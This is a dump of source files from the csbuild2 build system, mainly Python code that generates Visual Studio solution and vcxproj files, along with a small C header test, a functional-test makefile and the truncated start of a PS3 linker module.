\n\t# Visual Studio solution files need to be UTF-8 with the byte order marker because Visual Studio is VERY picky\n\t# about these files. If ANYTHING is missing or not formatted properly, the Visual Studio version selector may\n\t# not open the solution with the right version or Visual Studio itself may refuse to even attempt to load the file.\n\twith codecs.open(tempFilePath, "w", "utf-8-sig") as f:\n\t\twriter = SolutionWriter(f)\n\n\t\twriter.Line("") # Required empty line.\n\t\twriter.Line("Microsoft Visual Studio Solution File, Format Version {}".format(vsInstallInfo.fileVersion))\n\t\twriter.Line("# Visual Studio {}".format(vsInstallInfo.versionId))\n\n\t\tflatProjectList = _buildFlatProjectList(rootProject)\n\n\t\t# Write out the initial setup data for each project and filter.\n\t\tfor project in flatProjectList:\n\t\t\tdata = "(\"{}\") = \"{}\", \"{}\", \"{}\"".format(project.slnTypeGuid, project.name, project.GetVcxProjFilePath(), project.guid)\n\n\t\t\twith writer.Section("Project", data):\n\t\t\t\tpass\n\n\t\t# Begin setting the global configuration data.\n\t\twith writer.Section("Global", ""):\n\n\t\t\t# Write out the build specs supported by this solution.\n\t\t\twith writer.Section("GlobalSection", "(SolutionConfigurationPlatforms) = preSolution"):\n\t\t\t\tvsPlatforms = set()\n\t\t\t\tfor buildSpec in BUILD_SPECS:\n\t\t\t\t\thandler = PLATFORM_HANDLERS[buildSpec]\n\t\t\t\t\tvsPlatform = _createVsPlatform(buildSpec, handler)\n\n\t\t\t\t\tvsPlatforms.add(vsPlatform)\n\n\t\t\t\t# Output the platforms sorted case-insensitively as Visual Studio expects.\n\t\t\t\tfor vsPlatform in sorted(vsPlatforms, key=lambda x: x.lower()):\n\t\t\t\t\twriter.Line("{0} = {0}".format(vsPlatform))\n\n\t\t\t# Write out the supported project-to-spec mappings.\n\t\t\twith writer.Section("GlobalSection", "(ProjectConfigurationPlatforms) = postSolution"):\n\t\t\t\tfor project in flatProjectList:\n\t\t\t\t\t# Only standard projects should be listed here.\n\t\t\t\t\tif project.projType == VsProjectType.Standard:\n\t\t\t\t\t\tvsPlatforms = set()\n\t\t\t\t\t\tfor buildSpec in BUILD_SPECS:\n\t\t\t\t\t\t\thandler = PLATFORM_HANDLERS[buildSpec]\n\t\t\t\t\t\t\tvsPlatform = _createVsPlatform(buildSpec, handler)\n\n\t\t\t\t\t\t\tvsPlatforms.add(vsPlatform)\n\n\t\t\t\t\t\t# Output the platforms sorted case-insensitively as Visual Studio expects.\n\t\t\t\t\t\tfor vsPlatform in sorted(vsPlatforms, key=lambda x: x.lower()):\n\t\t\t\t\t\t\twriter.Line("{0}.{1}.ActiveCfg = {1}".format(project.guid, vsPlatform))\n
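# --- Editor-added illustration (not part of the original source) ---
# The SolutionWriter.Section context manager above nests to produce the matched
# Begin/End pairs the .sln format expects. A runnable sketch of the output shape,
# writing to stdout instead of a solution file:
import contextlib
import sys

class _DemoWriter(object):
	def __init__(self):
		self.indentation = 0
	def Line(self, text):
		sys.stdout.write("{}{}\r\n".format("\t" * self.indentation, text))
	@contextlib.contextmanager
	def Section(self, sectionName, headerSuffix):
		self.Line("{}{}".format(sectionName, headerSuffix))
		self.indentation += 1
		try:
			yield
		finally:
			self.indentation -= 1
			self.Line("End{}".format(sectionName))

_writer = _DemoWriter()
with _writer.Section("Global", ""):
	with _writer.Section("GlobalSection", "(SolutionProperties) = preSolution"):
		_writer.Line("HideSolutionNode = FALSE")
# Emits: Global / GlobalSection(...) = preSolution / HideSolutionNode = FALSE / EndGlobalSection / EndGlobal
# --- End editor-added illustration ---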
\n\t\t\t\t\t\t\t# Only enable the BuildAll project. This will make sure the global build command only\n\t\t\t\t\t\t\t# builds this project and none of the others (which can still be selectively built).\n\t\t\t\t\t\t\tif project.subType == VsProjectSubType.BuildAll:\n\t\t\t\t\t\t\t\twriter.Line("{0}.{1}.Build.0 = {1}".format(project.guid, vsPlatform))\n\n\t\t\t# Write out any standalone solution properties.\n\t\t\twith writer.Section("GlobalSection", "(SolutionProperties) = preSolution"):\n\t\t\t\twriter.Line("HideSolutionNode = FALSE")\n\n\t\t\tnestedProjectsMappings = set()\n\t\t\tfor parentProject in flatProjectList:\n\t\t\t\tfor childProject in parentProject.children:\n\t\t\t\t\tnestedProjectsMappings.add("{} = {}".format(childProject.guid, parentProject.guid))\n\n\t\t\t# Write out the mappings that describe the solution hierarchy.\n\t\t\tif nestedProjectsMappings:\n\t\t\t\twith writer.Section("GlobalSection", "(NestedProjects) = preSolution"):\n\t\t\t\t\tfor mapping in sorted(nestedProjectsMappings):\n\t\t\t\t\t\twriter.Line(mapping)\n\n\t\tf.flush()\n\t\tos.fsync(f.fileno())\n\n\t# Transfer the temp file to the final output location.\n\tVsFileProxy(realFilePath, tempFilePath).Check()\n\n\ndef _saveXmlFile(realFilePath, rootNode):\n\t# Grab a string of the XML document we've created and save it.\n\txmlString = PlatformString(ET.tostring(rootNode))\n\n\t# Use minidom to reformat the XML since ElementTree doesn't do it for us.\n\tformattedXmlString = PlatformString(minidom.parseString(xmlString).toprettyxml("\t", "\n", encoding = "utf-8"))\n\n\ttmpFd, tempFilePath = tempfile.mkstemp(prefix="vs_vcxproj_")\n\n\t# Write the temp XML file data.\n\twith os.fdopen(tmpFd, "w") as f:\n\t\tf.write(formattedXmlString)\n\n\tVsFileProxy(realFilePath, tempFilePath).Check()\n\n\ndef _writeMainVcxProj(outputRootPath, project, globalPlatformHandlers):\n\toutputFilePath = os.path.join(outputRootPath, project.GetVcxProjFilePath())\n\toutputDirPath = os.path.dirname(outputFilePath)\n\n\t# Create the root XML node with the default data.\n\trootXmlNode = _createRootXmlNode("Project")\n\trootXmlNode.set("DefaultTargets", "Build")\n\trootXmlNode.set("ToolsVersion", "4.0")\n\trootXmlNode.set("xmlns", "http://schemas.microsoft.com/developer/msbuild/2003")\n\n\t_makeXmlCommentNode(rootXmlNode, "Project header")\n\n\t# Write any top-level information a generator platform may require.\n\tfor _, platformHandler in globalPlatformHandlers.items():\n\t\tplatformHandler.WriteGlobalHeader(rootXmlNode, project)\n\n\t_makeXmlCommentNode(rootXmlNode, "Project configurations")\n\n\titemGroupXmlNode = _addXmlNode(rootXmlNode, "ItemGroup")\n\titemGroupXmlNode.set("Label", "ProjectConfigurations")\n\n\t# Write the project configurations.\n\tfor buildSpec in BUILD_SPECS:\n\t\tplatformHandler = PLATFORM_HANDLERS[buildSpec]\n\t\tplatformHandler.WriteProjectConfiguration(itemGroupXmlNode, project, buildSpec, _getVsConfigName(buildSpec))\n\n\t_makeXmlCommentNode(rootXmlNode, "Project files")\n\n\t# Write the project's files.\n\tflatProjectItems = _buildFlatProjectItemList(project.items)\n\tflatProjectItems = [item for item in flatProjectItems if item.itemType == VsProjectItemType.File]\n\tgroupedProjectItems = {}\n\n\t# Group the project file items by XML tag.\n\tfor item in flatProjectItems:\n\t\tif item.tag not in groupedProjectItems:\n\t\t\tgroupedProjectItems.update({ item.tag: [] })\n\n\t\tgroupedProjectItems[item.tag].append(item)\n\n\t# Write out each item for each tagged group.\n\tfor key in 
sorted(groupedProjectItems.keys()):\n\t\tprojectItems = groupedProjectItems[key]\n\t\titemGroupXmlNode = _addXmlNode(rootXmlNode, \"ItemGroup\")\n\n\t\tfor item in projectItems:\n\t\t\tsourceFileXmlNode = _addXmlNode(itemGroupXmlNode, item.tag)\n\t\t\tsourceFileXmlNode.set(\"Include\", _constructRelPath(os.path.join(item.dirPath, item.name), outputDirPath))\n\n\t\t\texcludeBuildSpecs = set(BUILD_SPECS).difference(item.supportedBuildSpecs)\n\t\t\tvsExcludedBuildTargets = []\n\n\t\t\tfor buildSpec in excludeBuildSpecs:\n\t\t\t\tplatformHandler = PLATFORM_HANDLERS[buildSpec]\n\t\t\t\tvsConfig = _getVsConfigName(buildSpec)\n\t\t\t\tvsPlatformName = platformHandler.GetVisualStudioPlatformName()\n\t\t\t\tvsBuildTarget = \"{}|{}\".format(vsConfig, vsPlatformName)\n\n\t\t\t\tvsExcludedBuildTargets.append(vsBuildTarget)\n\n\t\t\tvsExcludedBuildTargets = sorted(vsExcludedBuildTargets, key=lambda x: x.lower())\n\n\t\t\t# Exclude the file item for each unsupported build spec.\n\t\t\tfor vsBuildTarget in vsExcludedBuildTargets:\n\t\t\t\texcludeXmlNode = _addXmlNode(sourceFileXmlNode, \"ExcludedFromBuild\")\n\t\t\t\texcludeXmlNode.set(\"Condition\", \"'$(Configuration)|$(Platform)'=='{}'\".format(vsBuildTarget))\n\t\t\t\texcludeXmlNode.text = \"true\"\n\n\t_makeXmlCommentNode(rootXmlNode, \"Project global properties\")\n\n\t# Add the global property group.\n\tpropertyGroupXmlNode = _addXmlNode(rootXmlNode, \"PropertyGroup\")\n\tpropertyGroupXmlNode.set(\"Label\", \"Globals\")\n\n\t_makeXmlCommentNode(rootXmlNode, \"Import properties\")\n\n\timportXmlNode = _addXmlNode(rootXmlNode, \"Import\")\n\timportXmlNode.set(\"Project\", r\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\")\n\n\tprojectGuidXmlNode = _addXmlNode(propertyGroupXmlNode, \"ProjectGuid\")\n\tprojectGuidXmlNode.text = project.guid\n\n\tnamespaceXmlNode = _addXmlNode(propertyGroupXmlNode, \"RootNamespace\")\n\tnamespaceXmlNode.text = project.name\n\n\t# We're not creating a native project, so Visual Studio needs to know this is a makefile project.\n\tkeywordXmlNode = _addXmlNode(propertyGroupXmlNode, \"Keyword\")\n\tkeywordXmlNode.text = \"MakeFileProj\"\n\n\t_makeXmlCommentNode(rootXmlNode, \"Platform config property groups\")\n\n\t# Write the config property groups for each platform.\n\tfor buildSpec in BUILD_SPECS:\n\t\tplatformHandler = PLATFORM_HANDLERS[buildSpec]\n\t\tplatformHandler.WriteConfigPropertyGroup(rootXmlNode, project, buildSpec, _getVsConfigName(buildSpec))\n\n\t_makeXmlCommentNode(rootXmlNode, \"Import properties (continued)\")\n\n\t# Write out the standard import property.\n\timportXmlNode = _addXmlNode(rootXmlNode, \"Import\")\n\timportXmlNode.set(\"Project\", r\"$(VCTargetsPath)\\Microsoft.Cpp.props\")\n\n\t# Write the import properties for each platform.\n\tfor buildSpec in BUILD_SPECS:\n\t\t# Skip build specs that are not supported by the project.\n\t\tif buildSpec not in project.supportedBuildSpecs:\n\t\t\tcontinue\n\n\t\tplatformHandler = PLATFORM_HANDLERS[buildSpec]\n\t\tplatformHandler.WriteImportProperties(rootXmlNode, project, buildSpec, _getVsConfigName(buildSpec))\n\n\t_makeXmlCommentNode(rootXmlNode, \"Platform build commands\")\n\n\t# Write the build commands for each platform.\n\tfor buildSpec in BUILD_SPECS:\n\t\t# Skip build specs that are not supported by the project.\n\t\tif buildSpec not in project.supportedBuildSpecs:\n\t\t\tcontinue\n\n\t\tplatformHandler = PLATFORM_HANDLERS[buildSpec]\n\t\textraBuildArgs = csbuild.GetSolutionArgs().replace(\",\", \" \")\n\n\t\tif project.subType == 
VsProjectSubType.Regen:\n\t\t\tbuildArgs = [\n\t\t\t\t\"\\\"{}\\\"\".format(_constructRelPath(REGEN_FILE_PATH, outputDirPath))\n\t\t\t]\n\n\t\t\trebuildArgs = buildArgs\n\t\t\tcleanArgs = buildArgs\n\n\t\telse:\n\t\t\tbuildArgs = [\n\t\t\t\t\"\\\"{}\\\"\".format(os.path.normcase(sys.executable)),\n\t\t\t\t\"\\\"{}\\\"\".format(_constructRelPath(MAKEFILE_PATH, outputDirPath)),\n\t\t\t\t\"-o\", \"\\\"{}\\\"\".format(buildSpec[0]),\n\t\t\t\t\"-a\", \"\\\"{}\\\"\".format(buildSpec[1]),\n\t\t\t\t\"-t\", \"\\\"{}\\\"\".format(buildSpec[2]),\n\t\t\t]\n\n\t\t\tif project.subType != VsProjectSubType.BuildAll:\n\t\t\t\tbuildArgs.extend([\n\t\t\t\t\t\"-p\", \"\\\"{}\\\"\".format(project.name),\n\t\t\t\t])\n\n\t\t\trebuildArgs = buildArgs + [\"-r\", extraBuildArgs]\n\t\t\tcleanArgs = buildArgs + [\"-c\", extraBuildArgs]\n\n\t\t\tbuildArgs.append(extraBuildArgs)\n\n\t\tbuildArgs = \" \".join([x for x in buildArgs if x])\n\t\trebuildArgs = \" \".join([x for x in rebuildArgs if x])\n\t\tcleanArgs = \" \".join([x for x in cleanArgs if x])\n\n\t\tvsConfig = _getVsConfigName(buildSpec)\n\t\tvsPlatformName = platformHandler.GetVisualStudioPlatformName()\n\t\tvsBuildTarget = \"{}|{}\".format(vsConfig, vsPlatformName)\n\n\t\tvsIncludePaths = platformHandler.GetIntellisenseIncludeSearchPaths(project, buildSpec) + \\\n\t\t\tsorted({ _constructRelPath(incPath, outputDirPath) for incPath in project.platformIncludePaths[buildSpec] })\n\n\t\tvsDefines = platformHandler.GetIntellisensePreprocessorDefinitions(project, buildSpec) + \\\n\t\t\tsorted(set(project.platformDefines[buildSpec])) + \\\n\t\t\t[\"$(NMakePreprocessorDefinitions)\"]\n\n\t\tpropertyGroupXmlNode = _addXmlNode(rootXmlNode, \"PropertyGroup\")\n\t\tpropertyGroupXmlNode.set(\"Condition\", \"'$(Configuration)|$(Platform)'=='{}'\".format(vsBuildTarget))\n\n\t\tbuildCommandXmlNode = _addXmlNode(propertyGroupXmlNode, \"NMakeBuildCommandLine\")\n\t\tbuildCommandXmlNode.text = buildArgs\n\n\t\trebuildCommandXmlNode = _addXmlNode(propertyGroupXmlNode, \"NMakeReBuildCommandLine\")\n\t\trebuildCommandXmlNode.text = rebuildArgs\n\n\t\tcleanCommandXmlNode = _addXmlNode(propertyGroupXmlNode, \"NMakeCleanCommandLine\")\n\t\tcleanCommandXmlNode.text = cleanArgs\n\n\t\tincludePathXmlNode = _addXmlNode(propertyGroupXmlNode, \"NMakeIncludeSearchPath\")\n\t\tincludePathXmlNode.text = \";\".join([x for x in vsIncludePaths if x])\n\n\t\tpreprocessorXmlNode = _addXmlNode(propertyGroupXmlNode, \"NMakePreprocessorDefinitions\")\n\t\tpreprocessorXmlNode.text = \";\".join([x for x in vsDefines if x])\n\n\t\tif project.subType == VsProjectSubType.Normal:\n\t\t\tbuildOutputType = project.platformOutputType[buildSpec]\n\t\t\tbuildOutputName = project.platformOutputName[buildSpec]\n\t\t\tbuildOutputDirPath = project.platformOutputDirPath[buildSpec]\n\t\t\tbuildIntermediateDirPath = project.platformIntermediateDirPath[buildSpec]\n\n\t\t\toutputExtension = platformHandler.GetOutputExtensionIfDebuggable(buildOutputType)\n\t\t\tadditionalOptions = platformHandler.GetIntellisenseAdditionalOptions(project, buildSpec)\n\n\t\t\t# Only include the NMakeOutput extension if the current project build has a debuggable output type.\n\t\t\t# This is what Visual Studio will look for when attempting to debug.\n\t\t\tif outputExtension:\n\t\t\t\toutputXmlNode = _addXmlNode(propertyGroupXmlNode, \"NMakeOutput\")\n\t\t\t\toutputXmlNode.text = _constructRelPath(os.path.join(buildOutputDirPath, \"{}{}\".format(buildOutputName, outputExtension)), outputDirPath)\n\n\t\t\t_addXmlNode(propertyGroupXmlNode, 
\"OutDir\").text = _constructRelPath(buildOutputDirPath, outputDirPath)\n\t\t\t_addXmlNode(propertyGroupXmlNode, \"IntDir\").text = _constructRelPath(buildIntermediateDirPath, outputDirPath)\n\n\t\t\tif additionalOptions:\n\t\t\t\t_addXmlNode(propertyGroupXmlNode, \"AdditionalOptions\").text = additionalOptions\n\n\t\telse:\n\t\t\t_addXmlNode(propertyGroupXmlNode, \"OutDir\").text = \".out\"\n\t\t\t_addXmlNode(propertyGroupXmlNode, \"IntDir\").text = \".int\"\n\n\t\tplatformHandler.WriteExtraPropertyGroupBuildNodes(propertyGroupXmlNode, project, buildSpec, vsConfig)\n\n\t_makeXmlCommentNode(rootXmlNode, \"Import targets\")\n\n\t# Write the global import targets.\n\t# MUST be before the \"Microsoft.Cpp.targets\" import!\n\tfor _, platformHandler in globalPlatformHandlers.items():\n\t\tplatformHandler.WriteGlobalImportTargets(rootXmlNode, project)\n\n\t_makeXmlCommentNode(rootXmlNode, \"Final import target; must always be the LAST import target!\")\n\n\timportXmlNode = _addXmlNode(rootXmlNode, \"Import\")\n\timportXmlNode.set(\"Project\", r\"$(VCTargetsPath)\\Microsoft.Cpp.targets\")\n\n\t_makeXmlCommentNode(rootXmlNode, \"Project footer\")\n\n\t# Write any trailing information needed by the project.\n\tfor _, platformHandler in globalPlatformHandlers.items():\n\t\tplatformHandler.WriteGlobalFooter(rootXmlNode, project)\n\n\t# Write out the XML file.\n\t_saveXmlFile(outputFilePath, rootXmlNode)\n\n\ndef _writeFiltersVcxProj(outputRootPath, project):\n\toutputFilePath = os.path.join(outputRootPath, project.GetVcxProjFilePath(\".filters\"))\n\toutputDirPath = os.path.dirname(outputFilePath)\n\n\trootXmlNode = _createRootXmlNode(\"Project\")\n\trootXmlNode.set(\"ToolsVersion\", \"4.0\")\n\trootXmlNode.set(\"xmlns\", \"http://schemas.microsoft.com/developer/msbuild/2003\")\n\n\t# Get a complete list of all items in the project.\n\tflatProjectItems = _buildFlatProjectItemList(project.items)\n\tif flatProjectItems:\n\t\t# Separate the folder items from the file items.\n\t\tprojectFolderItems = [item for item in flatProjectItems if item.itemType == VsProjectItemType.Folder]\n\t\tprojectFileItems = [item for item in flatProjectItems if item.itemType == VsProjectItemType.File]\n\t\tgroupedFileItems = {}\n\n\t\t# Split the file items by XML tag.\n\t\tfor item in projectFileItems:\n\t\t\tif item.tag not in groupedFileItems:\n\t\t\t\tgroupedFileItems.update({ item.tag: [] })\n\n\t\t\tgroupedFileItems[item.tag].append(item)\n\n\t\tif projectFolderItems:\n\t\t\titemGroupXmlNode = _addXmlNode(rootXmlNode, \"ItemGroup\")\n\n\t\t\t# Write out the filter nodes.\n\t\t\tfor item in projectFolderItems:\n\t\t\t\tfilterXmlNode = _addXmlNode(itemGroupXmlNode, \"Filter\")\n\t\t\t\tfilterXmlNode.set(\"Include\", os.path.join(item.dirPath, item.name))\n\n\t\t\t\tuniqueIdXmlNode = _addXmlNode(filterXmlNode, \"UniqueIdentifier\")\n\t\t\t\tuniqueIdXmlNode.text = item.guid\n\n\t\t# Go through each item tag.\n\t\tfor itemTag in sorted(groupedFileItems.keys()):\n\t\t\tfileItems = groupedFileItems[itemTag]\n\n\t\t\titemGroupXmlNode = _addXmlNode(rootXmlNode, \"ItemGroup\")\n\n\t\t\t# Write out the project file items for the current tag.\n\t\t\tfor item in fileItems:\n\t\t\t\tsourceFileXmlNode = _addXmlNode(itemGroupXmlNode, item.tag)\n\t\t\t\tsourceFileXmlNode.set(\"Include\", _constructRelPath(os.path.join(item.dirPath, item.name), outputDirPath))\n\n\t\t\t\tfilterXmlNode = _addXmlNode(sourceFileXmlNode, \"Filter\")\n\t\t\t\tfilterXmlNode.text = item.GetSegmentPath()\n\n\t# Write out the XML 
file.\n\t_saveXmlFile(outputFilePath, rootXmlNode)\n\n\ndef _writeUserVcxProj(outputRootPath, project, preserve):\n\toutputFilePath = os.path.join(outputRootPath, project.GetVcxProjFilePath(".user"))\n\n\t# Create the XML document if we're not explicitly preserving the old file or the old file doesn't exist.\n\tif not preserve or not os.access(outputFilePath, os.F_OK):\n\t\trootXmlNode = _createRootXmlNode("Project")\n\t\trootXmlNode.set("ToolsVersion", "4.0")\n\t\trootXmlNode.set("xmlns", "http://schemas.microsoft.com/developer/msbuild/2003")\n\n\t\t# Write out the user debug settings.\n\t\tif project.subType == VsProjectSubType.Normal:\n\t\t\tfor buildSpec in BUILD_SPECS:\n\t\t\t\t# Skip build specs that are not supported by the project.\n\t\t\t\tif buildSpec not in project.supportedBuildSpecs:\n\t\t\t\t\tcontinue\n\n\t\t\t\tplatformHandler = PLATFORM_HANDLERS[buildSpec]\n\t\t\t\tplatformHandler.WriteUserDebugPropertyGroup(rootXmlNode, project, buildSpec, _getVsConfigName(buildSpec))\n\n\t\t# Write out the XML file.\n\t\t_saveXmlFile(outputFilePath, rootXmlNode)\n\n\telse:\n\t\t# No output file needed.\n\t\tlog.Build("[SKIPPING] {}".format(outputFilePath))\n\n\n\ndef _writeProjectFiles(rootProject, outputRootPath, preserveUserFiles):\n\tglobal PLATFORM_HANDLERS\n\tglobal BUILD_SPECS\n\tglobal MAKEFILE_PATH\n\tglobal REGEN_FILE_PATH\n\n\tflatProjectList = _buildFlatProjectList(rootProject)\n\tglobalPlatformHandlers = {}\n\n\t# We'll need a single copy of each platform's handler regardless of VS config.\n\t# Having this mapping simplifies the lookup when writing the global sections.\n\tfor buildSpec in BUILD_SPECS:\n\t\tplatformHandler = PLATFORM_HANDLERS[buildSpec]\n\t\tvsPlatformName = platformHandler.GetVisualStudioPlatformName()\n\n\t\tif vsPlatformName not in globalPlatformHandlers:\n\t\t\tglobalPlatformHandlers.update({ vsPlatformName: platformHandler })\n\n\t# Write all the necessary files for each project.\n\tfor project in flatProjectList:\n\t\tif project.projType == VsProjectType.Standard:\n\t\t\t_writeMainVcxProj(outputRootPath, project, globalPlatformHandlers)\n\t\t\t_writeFiltersVcxProj(outputRootPath, project)\n\t\t\t_writeUserVcxProj(outputRootPath, project, preserveUserFiles)\n\n\ndef UpdatePlatformHandlers(handlers): # pylint: disable=missing-docstring\n\tglobal PLATFORM_HANDLERS\n\n\tfixedHandlers = {}\n\n\t# Validate the handlers before adding the mappings to the global dictionary.\n\tfor key, cls in handlers:\n\t\tif isinstance(key, tuple) and cls is not None:\n\t\t\tkey = list(key) # Convert the key to a list so we can modify it if necessary.\n\n\t\t\t# Discard any tuple keys that don't have at least 3 elements.\n\t\t\tif len(key) < 3:\n\t\t\t\tlog.Warn("Discarding Visual Studio platform handler mapping due to incorrect key format: {}".format(key))\n\t\t\t\tcontinue\n\n\t\t\t# Limit the key tuple to 3 elements.\n\t\t\tkey = key[:3]\n\n\t\t\t# It's valid for the 3rd element to be a string initially, but for the mappings, we'll need it in a tuple.\n\t\t\tif isinstance(key[2], str):\n\t\t\t\tkey[2] = ( key[2], )\n\n\t\t\t# Anything else will default to an empty tuple.\n\t\t\telif not isinstance(key[2], tuple) or key[2] is None:\n\t\t\t\tkey[2] = tuple()\n\n\t\t\t# Convert the key back to a tuple for mapping it into the fixed handlers dictionary.\n\t\t\tkey = tuple(key)\n\n\t\t\tfixedHandlers[key] = cls\n\n\tPLATFORM_HANDLERS.update(fixedHandlers)\n\n\ndef WriteProjectFiles(outputRootPath, solutionName, generators, vsVersion):\n\t"""\n\tWrite out the 
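# --- Editor-added illustration (not part of the original source; the example keys are hypothetical) ---
# UpdatePlatformHandlers() above normalizes the third key element so that a single
# config string and a tuple of configs map identically. Just that normalization,
# extracted into a runnable sketch:
def _normalizeHandlerKey(key):
	key = list(key[:3])
	if isinstance(key[2], str):
		key[2] = ( key[2], )
	elif not isinstance(key[2], tuple):
		key[2] = tuple()
	return tuple(key)

assert _normalizeHandlerKey(("msvc", "x64", "Debug")) == ("msvc", "x64", ("Debug",))
assert _normalizeHandlerKey(("gcc", "arm64", ("Debug", "Release"))) == ("gcc", "arm64", ("Debug", "Release"))
# --- End editor-added illustration ---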
Visual Studio project files.\n\n\t:param outputRootPath: Root path for all output files.\n\t:type outputRootPath: str\n\n\t:param solutionName: Name of the output solution file.\n\t:type solutionName: str\n\n\t:param generators: List of project generators.\n\t:type generators: list[csbuild.tools.project_generators.visual_studio.VsProjectGenerator]\n\n\t:param vsVersion: Version of Visual Studio to create projects for.\n\t:type vsVersion: str\n\t\"\"\"\n\tglobal FILE_FORMAT_VERSION_INFO\n\n\tvsInstallInfo = FILE_FORMAT_VERSION_INFO.get(vsVersion, None)\n\tif not vsInstallInfo:\n\t\tlog.Error(\"Unknown version of Visual Studio: {}\".format(vsVersion))\n\t\treturn\n\n\tlog.Build(\"Creating project files for {}\".format(vsInstallInfo.friendlyName))\n\n\tgenerators = _evaluatePlatforms(generators, vsInstallInfo)\n\tif not generators:\n\t\tlog.Error(\"No projects available, cannot generate solution\")\n\t\treturn\n\n\t_createRegenerateBatchFile(outputRootPath)\n\n\trootProject = _buildProjectHierarchy(generators)\n\tpreserveUserFiles = True # TODO: This should eventually be set from a command line switch.\n\n\t_writeSolutionFile(rootProject, outputRootPath, solutionName, vsInstallInfo)\n\t_writeProjectFiles(rootProject, outputRootPath, preserveUserFiles)\n" }, { "alpha_fraction": 0.6785714030265808, "alphanum_fraction": 0.6785714030265808, "avg_line_length": 13, "blob_id": "027cad1c66030e4536aada84796243c6058bc877", "content_id": "c264085f5cc8d161fa565f0476a39d21cfa1d179", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 28, "license_type": "no_license", "max_line_length": 14, "num_lines": 2, "path": "/functional_tests/cpp_recursive_header_test/hello_world/a.h", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#pragma once\n#include \"b.h\"\n" }, { "alpha_fraction": 0.7590425610542297, "alphanum_fraction": 0.7611702084541321, "avg_line_length": 35.153846740722656, "blob_id": "4d81d2fbbbb0451e10f955766ad8b0c5242c8264", "content_id": "8a9b89053d8d37c865a4634ec639a50062eaae3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1880, "license_type": "no_license", "max_line_length": 79, "num_lines": 52, "path": "/functional_tests/output_files_sync_after_build_test/make.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. 
module:: make\n\t:synopsis: Makefile for this test\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport subprocess\n\nfrom csbuild.toolchain import Tool\nfrom csbuild import log\n\ncsbuild.SetOutputDirectory(\"out\")\n\nclass Execute(Tool):\n\t\"\"\"Simple tool that executes its input files and returns a fake output\"\"\"\n\tinputFiles = {\".exe\", \"\"}\n\toutputFiles = {\".fake\"}\n\tsupportedArchitectures = None\n\n\tdef Run(self, inputProject, inputFile):\n\t\tlog.Command(\"Executing {}\", inputFile.filename)\n\t\tsubprocess.check_output([inputFile.filename])\n\t\treturn \"blah.fake\"\n\ncsbuild.Toolchain(\"gcc\", \"msvc\").AddTool(Execute)\n\nwith csbuild.Project(\"hello_world\", \"hello_world\"):\n\tcsbuild.SetOutput(\"hello_world\", csbuild.ProjectType.Application)\n" }, { "alpha_fraction": 0.6800376176834106, "alphanum_fraction": 0.6873498558998108, "avg_line_length": 33.43525314331055, "blob_id": "e26a1f74bc45e69ad0cedf7337c842267fe62d3f", "content_id": "bcf5e59f7370a92b5172a414274bd54aecf330f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9573, "license_type": "no_license", "max_line_length": 134, "num_lines": 278, "path": "/csbuild/tools/linkers/ps3_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: ps3_linker\n\t:synopsis: Implementation of the PS3 linker tool.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom .linker_base import LinkerBase, LibraryError\n\nfrom ..common import FindLibraries\nfrom ..common.sony_tool_base import Ps3BaseTool, Ps3ProjectType, Ps3ToolsetType\n\nfrom ... 
